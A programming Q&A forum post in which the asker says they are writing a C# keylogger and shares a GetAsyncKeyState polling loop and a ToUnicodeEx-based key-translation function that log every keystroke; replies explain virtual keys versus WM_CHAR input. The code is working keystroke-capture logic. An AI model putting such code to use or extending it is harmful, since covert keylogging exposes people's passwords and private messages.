# Capture special keys chars

Tags: c#, .net, keylogger

I am doing a keylogger, I process the active keys with `GetAsyncKeyState`.

```
Keys lastKey = 0;
while (true)
{
    Boolean shiftKey;
    Boolean capsLock;
    String text = "";
    Thread.Sleep(captureTime);
    for (int i = 0; i< 1000; i++)
    {
        int keyState = GetAsyncKeyState(i);
        if (keyState == 1 || keyState == -32767)
        {
            shiftKey = Convert.ToBoolean(GetAsyncKeyState((int) Keys.ShiftKey));
            capsLock = Convert.ToBoolean(GetAsyncKeyState((int) Keys.CapsLock));
            text = processKey((Keys) i, shiftKey, capsLock);

            if (checkNewLine(lastKey, (Keys) i))
            {
                saveLog(text);
            }
            lastKey = (Keys) i;
        }
    }
}
```

The key processing function processKey, process a key depending of the key type, but I have no idea how to process special keys like "¿?:;!·$%&" that require shift or other special characters that requires alt like "@#".

I want to write the special character not a combination of separate characters, for example if i press shift+0 the console should output "=", but in my case the console writes "[SHIFT]" "0" apart.

There's is the processKey function (unicode):

```
switch(key)
{

    case Keys.Back:
    case Keys.ShiftKey:
        text = "["+key.ToString()+"]";
        break;
    case Keys.Enter:
        text = Environment.NewLine;
        break;
    case Keys.Space:
        text = " ";
        break;
    case Keys.Tab:
        text = "\t";
        break;
    default:
        IntPtr windowHandle = GetForegroundWindow();
        uint processId;
        uint threadId = GetWindowThreadProcessId(windowHandle, out processId);
        byte[] kState = new byte[256];
        GetKeyboardState(kState);
        uint layout = GetKeyboardLayout(threadId);
        StringBuilder keyName = new StringBuilder();
        ToUnicodeEx((uint)key, (uint)key, kState, keyName, 16, 0, layout);
        text = keyName.ToString();
        if((int)key >=65 && (int)key <= 90)
        {
            text = (!shiftKey && capsLock || shiftKey && !capsLock ? Convert.ToChar(key).ToString()
            : Convert.ToChar(key).ToString().ToLower());
        }

        break;
}
return text;
```

Comment: It starts to get really complicated when you have to deal with [dead keys](http://archives.miloush.net/michkap/archive/2006/03/24/559169.html) - reading that whole series will help you a lot.

Answer (score 1):

You're confusing two concepts.

1. GetAsyncKeyState returns state of virtual KEY, in other words it tells you, if key on keyboard is pressed (or not).
2. when you say you want to process $ or %, those arent key, those are input characters. Windows will create those for you, but you need to handle WM_CHAR message. As a bonus this will also deal with unicode.

You should probably use 2 approach.

Also: you shouldnt use while(1) { ... sleep() ... } loop style.